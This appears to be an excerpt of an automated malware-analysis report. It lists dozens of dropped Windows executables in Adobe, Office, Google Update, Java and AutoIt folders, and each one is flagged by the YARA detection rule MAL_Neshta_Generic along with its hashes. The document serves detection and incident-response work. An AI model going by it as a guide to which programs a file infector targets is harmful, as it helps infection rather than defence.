          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
